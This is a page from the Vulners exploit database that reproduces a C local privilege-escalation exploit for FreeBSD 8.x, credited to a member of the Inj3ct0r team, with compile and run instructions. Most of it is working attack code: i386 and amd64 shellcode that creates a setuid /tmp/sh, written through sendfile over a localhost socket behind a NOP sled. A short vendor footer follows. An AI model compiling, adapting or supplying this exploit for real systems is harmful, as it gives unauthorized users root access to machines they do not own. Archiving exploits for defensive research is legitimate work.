Vulners
Lucene search
bsd/x86 Ver. 8.x - Local Root Exploit
/*
*
*
* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
* 0 _ __ __ __ 1
* 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
* 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
* 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
* 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
* 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
* 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
* 1 \ \____/ >> Exploit database separated by exploit 0
* 0 \/___/ type (local, remote, DoS, etc.) 1
* 1 1
* 0 [x] Official Website: http://www.1337day.com 0
* 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
* 0 0
* 1 ========================================== 1
* 0 I'm Taurus Omar Member From Inj3ct0r TEAM 1
* 1 ========================================== 0
* 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
* | |
* | BSD/x86 Ver. 8.x - Local Root Exploit |
* --------------------------------------------------------------------------
*
* +----------------| ABOUT ME |--------------------+
* NAME: TAURUS OMAR -
* LINE: INDEPENDENT SECURITY RESEARCHER -
* HOME: ACCESOILEGAL.BLOGSPOT.COM -
* TWITTER: @taurusomar_ -
* E-MAIL: omar-taurus[at]dragonsecurity[dot]org -
* E-MAIL: omar-taurus[at]live[dot]com -
* PWNED: #ZUUU -
* +------------------------------------------------+
*
*
* +-------------------------------+
* Proof of CONCEPT IMAGES
* http://i.imgur.com/whR3E.jpg
* +-------------------------------+
* Usage:
* gcc 1337.c -o 1337
* chmod 777 1337
* ./1337
*
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/proc.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <sys/select.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <string.h>
#include <err.h>
main (int argc, char *argv[]) {
int s, f, k2;
struct sockaddr_in addr;
int flags;
char str32[]=
"\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d\x2f\x74\x6d\x89\xe3"
"\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f"
"\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d"
"\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";
char str64[]=
"\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\x2f\x74\x6d\x70\x2f\x73\x68"
"\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05"
"\xb0\x0f\x48\x31\xf6\x66\xbe\xed\x0d\x0f\x05\x48\x31\xc0\x99\xb0"
"\x3b\x48\xbf\x2f\x74\x6d\x70\x2f\x73\x68\x32\x6a\x00\x57\x48\x89"
"\xe7\x57\x52\x48\x89\xe6\x0f\x05";
char buf[20000];
char *p;
struct stat sb;
int n;
fd_set wset;
int64_t size;
off_t sbytes;
off_t sent = 0;
int chunk;
int arch = 3;
if (argc != 2) {
printf("Definiendo Arquitectura.\n");
return;
}
if (strcmp(argv[1], "i386") == 0)
arch=1;
if (strcmp(argv[1], "amd64") == 0)
arch=2;
if (arch == 3) {
printf("Arquitectura Definida i386 or amd64\n");
return;
}
s = socket(AF_INET, SOCK_STREAM, 0);
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(7030);
addr.sin_addr.s_addr = inet_addr("127.0.0.1");
n = connect(s, (struct sockaddr *)&addr, sizeof (addr));
if (n < 0)
warn ("fail to connect");
f = open("/bin/sh", O_RDONLY);
if (f<0)
warn("fail to open file");
n = fstat(f, &sb);
if (n<0)
warn("fstat failed");
size = sb.st_size;
chunk = 0;
flags = fcntl(f, F_GETFL);
flags |= O_NONBLOCK;
fcntl(f, F_SETFL, flags);
while (size > 0) {
FD_ZERO(&wset);
FD_SET(s, &wset);
n = select(f+1, NULL, &wset, NULL, NULL);
if (n < 0)
continue;
if (chunk > 0) {
sbytes = 0;
if (arch == 1)
n = sendfile(f, s, 2048*2, chunk, NULL, &sbytes,0);
if (arch == 2)
n = sendfile(f, s, 1204*6, chunk, NULL, &sbytes,0);
if (n < 0)
continue;
chunk -= sbytes;
size -= sbytes;
sent += sbytes;
continue;
}
chunk = 2048;
memset(buf, '\0', sizeof buf);
if (arch == 1) {
for (k2=0;k2<256;k2++) {
buf[k2] = 0x90;
}
p = buf;
p = p + k2;
memcpy(p, str32, sizeof str32);
n = k2 + sizeof str32;
p = buf;
}
if (arch == 2) {
for (k2=0;k2<100;k2++) {
buf[k2] = 0x90;
}
p = buf;
p = p + k2;
memcpy(p, str64, sizeof str64);
n = k2 + sizeof str64;
p = buf;
}
write(s, p, n);
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Sep 2012 00:00Current
0.3Low risk
Vulners AI Score0.3